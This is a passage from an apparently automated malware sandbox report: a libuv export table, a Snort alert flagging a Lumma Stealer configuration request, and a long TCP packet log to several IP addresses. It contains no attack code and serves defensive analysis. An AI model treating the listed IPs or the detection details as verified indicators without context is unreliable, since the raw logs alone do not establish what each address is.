uv_pipe_open	806	0x140155790
uv_pipe_pending_instances	807	0x140152e50
uv_poll_init	808	0x140144080
uv_poll_init_socket	809	0x1401440b0
uv_poll_start	810	0x140144260
uv_poll_stop	811	0x1401442c0
uv_prepare_init	812	0x140147350
uv_prepare_start	813	0x140147380
uv_prepare_stop	814	0x140147460
uv_process_kill	815	0x14014cdf0
uv_queue_work	816	0x140151e50
uv_read2_start	817	0x140152060
uv_read_start	818	0x140151fc0
uv_read_stop	819	0x1401520f0
uv_ref	820	0x1401421c0
uv_req_size	821	0x1401411b0
uv_resident_set_memory	822	0x140146780
uv_run	823	0x140140f00
uv_rwlock_destroy	824	0x14015aef0
uv_rwlock_init	825	0x14015ae90
uv_rwlock_rdlock	826	0x14015af20
uv_rwlock_rdunlock	827	0x14015afe0
uv_rwlock_tryrdlock	828	0x14015af70
uv_rwlock_trywrlock	829	0x14015b050
uv_rwlock_wrlock	830	0x14015b030
uv_rwlock_wrunlock	831	0x14015b090
uv_sem_destroy	832	0x14015b0e0
uv_sem_init	833	0x14015b0b0
uv_sem_post	834	0x14015b100
uv_sem_trywait	835	0x14015b150
uv_sem_wait	836	0x14015b130
uv_set_process_title	837	0x140146390
uv_setup_args	838	0x140295cd0
uv_shutdown	839	0x140152320
uv_signal_init	840	0x140156300
uv_signal_start	841	0x140156400
uv_signal_stop	842	0x140156350
uv_spawn	843	0x14014c770
uv_stop	844	0x140142200
uv_strerror	845	0x140141700
uv_strlcat	846	0x140141240
uv_strlcpy	847	0x140141210
uv_tcp_bind	848	0x140141b20
uv_tcp_bind6	849	0x140141b70
uv_tcp_connect	850	0x140141db0
uv_tcp_connect6	851	0x140141e00
uv_tcp_getpeername	852	0x1401581f0
uv_tcp_getsockname	853	0x140158160
uv_tcp_init	854	0x140156a20
uv_tcp_keepalive	855	0x140159100
uv_tcp_nodelay	856	0x140159060
uv_tcp_open	857	0x140159550
uv_tcp_simultaneous_accepts	858	0x140159240
uv_thread_create	859	0x1401420c0
uv_thread_join	860	0x14015ade0
uv_thread_self	861	0x140142150
uv_timer_again	862	0x140144c30
uv_timer_get_repeat	863	0x140144d90
uv_timer_init	864	0x140144a80
uv_timer_set_repeat	865	0x140144d40
uv_timer_start	866	0x140144ac0
uv_timer_stop	867	0x140144bc0
uv_tty_get_winsize	868	0x140147e00
uv_tty_init	869	0x140147b20
uv_tty_reset_mode	870	0x140368010
uv_tty_set_mode	871	0x140147ce0
uv_udp_bind	872	0x140141be0
uv_udp_bind6	873	0x140141c30
uv_udp_getsockname	874	0x140159630
uv_udp_init	875	0x140159880
uv_udp_open	876	0x14015a8e0
uv_udp_recv_start	877	0x140141fd0
uv_udp_recv_stop	878	0x140142000
uv_udp_send	879	0x140141e60
uv_udp_send6	880	0x140141f50
uv_udp_set_broadcast	881	0x14015a810
uv_udp_set_membership	882	0x14015a6a0
uv_udp_set_multicast_loop	883	0x14015abe0
uv_udp_set_multicast_ttl	884	0x14015aac0
uv_udp_set_ttl	885	0x14015a9a0
uv_unref	886	0x1401421e0
uv_update_time	887	0x1401443a0
uv_uptime	888	0x140146810
uv_version	889	0x140147b00
uv_version_string	890	0x140147b10
uv_walk	891	0x140142160
uv_write	892	0x140152160
uv_write2	893	0x140152260

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4172.67.195.22949738802046637 09/05/23-13:02:23.880969	TCP	2046637	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Configuration Request Attempt	49738	80	192.168.2.4	172.67.195.229

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 5, 2023 13:01:19.715096951 CEST	49717	443	192.168.2.4	104.18.6.142
Sep 5, 2023 13:01:19.715147972 CEST	443	49717	104.18.6.142	192.168.2.4
Sep 5, 2023 13:01:19.715249062 CEST	49717	443	192.168.2.4	104.18.6.142
Sep 5, 2023 13:01:19.757509947 CEST	49717	443	192.168.2.4	104.18.6.142
Sep 5, 2023 13:01:19.757533073 CEST	443	49717	104.18.6.142	192.168.2.4
Sep 5, 2023 13:01:20.051014900 CEST	443	49717	104.18.6.142	192.168.2.4
Sep 5, 2023 13:01:20.051143885 CEST	49717	443	192.168.2.4	104.18.6.142
Sep 5, 2023 13:01:20.125375986 CEST	49717	443	192.168.2.4	104.18.6.142
Sep 5, 2023 13:01:20.125420094 CEST	443	49717	104.18.6.142	192.168.2.4
Sep 5, 2023 13:01:20.126379013 CEST	443	49717	104.18.6.142	192.168.2.4
Sep 5, 2023 13:01:20.179172039 CEST	49717	443	192.168.2.4	104.18.6.142
Sep 5, 2023 13:01:20.452742100 CEST	49717	443	192.168.2.4	104.18.6.142
Sep 5, 2023 13:01:20.495522022 CEST	443	49717	104.18.6.142	192.168.2.4
Sep 5, 2023 13:01:20.778733015 CEST	443	49717	104.18.6.142	192.168.2.4
Sep 5, 2023 13:01:20.778847933 CEST	443	49717	104.18.6.142	192.168.2.4
Sep 5, 2023 13:01:20.778980017 CEST	49717	443	192.168.2.4	104.18.6.142
Sep 5, 2023 13:01:20.789666891 CEST	49717	443	192.168.2.4	104.18.6.142
Sep 5, 2023 13:01:20.789773941 CEST	443	49717	104.18.6.142	192.168.2.4
Sep 5, 2023 13:01:20.789781094 CEST	49717	443	192.168.2.4	104.18.6.142
Sep 5, 2023 13:01:20.789802074 CEST	443	49717	104.18.6.142	192.168.2.4
Sep 5, 2023 13:01:20.948575974 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:20.948628902 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:20.948767900 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:20.949826002 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:20.949851036 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.236452103 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.236735106 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.242722988 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.242748976 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.243153095 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.245182037 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.287494898 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.649578094 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.649679899 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.649724007 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.649770021 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.649790049 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.649805069 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.649864912 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.649876118 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.649943113 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.649952888 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.649964094 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.650021076 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.650028944 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.650105953 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.650156975 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.650166035 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.650831938 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.650878906 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.650923967 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.650933981 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.650945902 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.651005030 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.651015043 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.651067019 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.651721001 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.651797056 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.651832104 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.651869059 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.651880980 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.651957035 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.652658939 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.652736902 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.652780056 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.652816057 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.652834892 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.652844906 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.652930975 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.653563023 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.653636932 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.653672934 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.653709888 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.653721094 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.653768063 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.654469013 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.654514074 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.654541969 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.654557943 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.654572010 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.654649973 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.677318096 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.677402020 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.677534103 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.677548885 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.677606106 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.677705050 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.677763939 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.677817106 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.677828074 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.678289890 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.678330898 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.678373098 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.678384066 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.678448915 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.679270983 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.679371119 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.778358936 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.778436899 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.778574944 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.778593063 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.778631926 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.778649092 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.781791925 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.781949043 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.781991005 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.782118082 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.784172058 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.784235001 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.784274101 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.784312010 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.784326077 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.784359932 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.784394026 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.784446001 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.784866095 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.784892082 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:21.784948111 CEST	49718	443	192.168.2.4	104.18.6.94
Sep 5, 2023 13:01:21.784961939 CEST	443	49718	104.18.6.94	192.168.2.4
Sep 5, 2023 13:01:22.005048990 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.005121946 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.005264997 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.005918026 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.005943060 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.452831030 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.452939987 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.506206989 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.506258965 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.506659985 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.507925987 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.551489115 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.679980993 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.700901031 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.700923920 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.701113939 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.701155901 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.701222897 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.730818033 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.730863094 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.731040955 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.731076956 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.783075094 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.840879917 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.840919971 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.841110945 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.841156006 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.841217995 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.864176989 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.864213943 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.864375114 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.864418030 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.864478111 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.882333994 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.882368088 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.882601976 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.882643938 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.882707119 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.896953106 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.896985054 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.897180080 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.897223949 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.897288084 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.976769924 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.976809025 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.977001905 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.977051020 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.977106094 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.991724014 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.991753101 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.992074013 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:22.992108107 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:22.992166996 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.002470016 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.002504110 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.002726078 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.002760887 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.002818108 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.014806986 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.014838934 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.015042067 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.015074968 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.015127897 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.025197983 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.025234938 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.025393963 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.025438070 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.025491953 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.038505077 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.038537979 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.038779020 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.038811922 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.038872004 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.043040037 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.043071985 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.043291092 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.043322086 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.043385983 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.057018995 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.057059050 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.057374001 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.057408094 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.057476044 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.116348028 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.116383076 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.116643906 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.116688967 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.116765976 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.125094891 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.125128984 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.125308990 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.125341892 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.125403881 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.131946087 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.131973982 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.132137060 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.132164955 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.132232904 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.138495922 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.138528109 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.138700008 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.138720989 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.138782024 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.145549059 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.145584106 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.145750999 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.145776987 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.145847082 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.151026964 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.151053905 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.151216984 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.151249886 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.151309967 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.157831907 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.157859087 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.158035040 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.158058882 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.158123970 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.163578033 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.163605928 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.163805008 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.163835049 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.163903952 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.169254065 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.169280052 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.169428110 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.169460058 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.169518948 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.174331903 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.174355984 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.174479008 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.174504995 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.174524069 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.174554110 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.179243088 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.179270029 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.179431915 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.179471016 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.179538012 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.184058905 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.184088945 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.184222937 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.184242964 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.184284925 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.184309959 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.188838959 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.188886881 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.188998938 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.189022064 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.189063072 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.189090967 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.193515062 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.193545103 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.193700075 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.193721056 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.193799973 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.198107004 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.198133945 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.198210001 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.198225975 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.198268890 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.198295116 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.202634096 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.202660084 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.202800989 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.202821970 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.202887058 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.206736088 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.206760883 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.206901073 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.206918955 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.206976891 CEST	49719	443	192.168.2.4	199.232.32.193
